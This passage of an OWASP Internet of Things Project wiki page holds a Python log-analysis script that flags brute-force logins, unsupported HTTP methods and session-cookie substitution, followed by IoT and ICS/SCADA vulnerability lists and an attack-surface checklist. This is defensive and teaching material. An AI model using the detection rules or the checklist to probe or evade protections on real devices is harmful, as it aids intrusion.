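Most of the events in the table can be derived from an ordinary device access log, provided the device records the source address, session identifier, user, method, path and result of each request. The following Python script is an added example written for this page, not part of the OWASP project or of AppSensor: it parses a constructed key=value access log (the line format, the thresholds and the enrolled-address list are assumptions made for the example) and emits events in the categories above for failed-password bursts, login-rate spikes, unsupported HTTP methods, a session whose source address changes, a session identifier reused by a different user, entry into administrative mode and traffic from an unenrolled address.<br />

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed device access log, not captured from a real device.
SAMPLE_LOG = """\
2019-03-08T10:00:01Z src=10.0.0.5 sid=- method=POST path=/login user=admin result=fail
2019-03-08T10:00:03Z src=10.0.0.5 sid=- method=POST path=/login user=admin result=fail
2019-03-08T10:00:04Z src=10.0.0.5 sid=- method=POST path=/login user=admin result=fail
2019-03-08T10:00:05Z src=10.0.0.5 sid=- method=POST path=/login user=admin result=fail
2019-03-08T10:00:06Z src=10.0.0.5 sid=- method=POST path=/login user=admin result=fail
2019-03-08T10:00:07Z src=10.0.0.5 sid=- method=POST path=/login user=admin result=ok
2019-03-08T10:00:20Z src=10.0.0.5 sid=s1 method=GET path=/admin/config user=admin result=ok
2019-03-08T10:01:00Z src=10.0.0.9 sid=s1 method=GET path=/admin/config user=admin result=ok
2019-03-08T10:02:00Z src=10.0.0.7 sid=s2 method=GET path=/api/status user=nurse result=ok
2019-03-08T10:02:30Z src=10.0.0.7 sid=s2 method=GET path=/api/status user=tech result=ok
2019-03-08T10:03:00Z src=192.168.50.4 sid=- method=TRACE path=/ user=- result=fail
"""

ENROLLED = {"10.0.0.5", "10.0.0.7", "10.0.0.9"}  # assumed ecosystem membership list


def parse_line(line):
    """Parse '<ISO-8601 timestamp> k=v k=v ...' into a dict; return None for lines that do not fit."""
    parts = line.strip().split()
    if len(parts) < 2:
        return None
    try:
        rec = dict(kv.split("=", 1) for kv in parts[1:])
        rec["ts"] = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
    except ValueError:
        return None
    return rec


def detect(lines, enrolled, allowed_methods=("GET", "POST", "PUT", "DELETE"),
           fail_threshold=3, rate_threshold=5, rate_window=timedelta(seconds=60)):
    """Return (category, event, detail) tuples; each condition is reported once per user/source/session."""
    events = []
    fails = defaultdict(int)          # user -> failed logins
    attempts = defaultdict(deque)     # src -> timestamps of login attempts inside the window
    rate_flagged, admin_sids, unenrolled = set(), set(), set()
    sid_src, sid_user = {}, {}        # session -> first source address / first user
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        src, sid, user = rec["src"], rec["sid"], rec["user"]
        if src not in enrolled and src not in unenrolled:
            unenrolled.add(src)
            events.append(("Ecosystem Membership Exceptions", "Traffic Seen from Unenrolled System", src))
        if rec["method"] not in allowed_methods:
            events.append(("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method",
                           f"{rec['method']} {rec['path']} from {src}"))
        if rec["path"] == "/login":
            q = attempts[src]
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > rate_window:
                q.popleft()
            if len(q) >= rate_threshold and src not in rate_flagged:
                rate_flagged.add(src)
                events.append(("Authentication Exceptions", "High Rate of Login Attempts", src))
            if rec["result"] == "fail":
                fails[user] += 1
                if fails[user] == fail_threshold:
                    events.append(("Authentication Exceptions", "Multiple Failed Passwords", user))
        if sid != "-":
            if sid_src.setdefault(sid, src) != src:
                events.append(("Session Exceptions", "Source Location Changes During Session",
                               f"{sid}: {sid_src[sid]} -> {src}"))
                sid_src[sid] = src
            if sid_user.setdefault(sid, user) != user:
                events.append(("Session Exceptions", "Substituting Another User's Valid SessionID or Cookie",
                               f"{sid}: {sid_user[sid]} -> {user}"))
                sid_user[sid] = user
            if rec["path"].startswith("/admin/") and rec["result"] == "ok" and sid not in admin_sids:
                admin_sids.add(sid)
                events.append(("Administrative Mode Events", "Device Entered Administrative Mode",
                               f"{user} via {sid}"))
    return events


if __name__ == "__main__":
    for category, event, detail in detect(SAMPLE_LOG.splitlines(), ENROLLED):
        print(f"[{category}] {event}: {detail}")
```

The thresholds are parameters so they can be tuned per device class, and each condition fires once per user, source or session so that a burst does not flood the collector downstream.<br />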
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data they collect.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div><br />
<br />
Earlier revision of OWASP Internet of Things Project, 2019-03-08T01:37:51Z, by Aaron.guzman (edit summary: /* Collaboration */), https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248540<br />
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute, and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
<br />
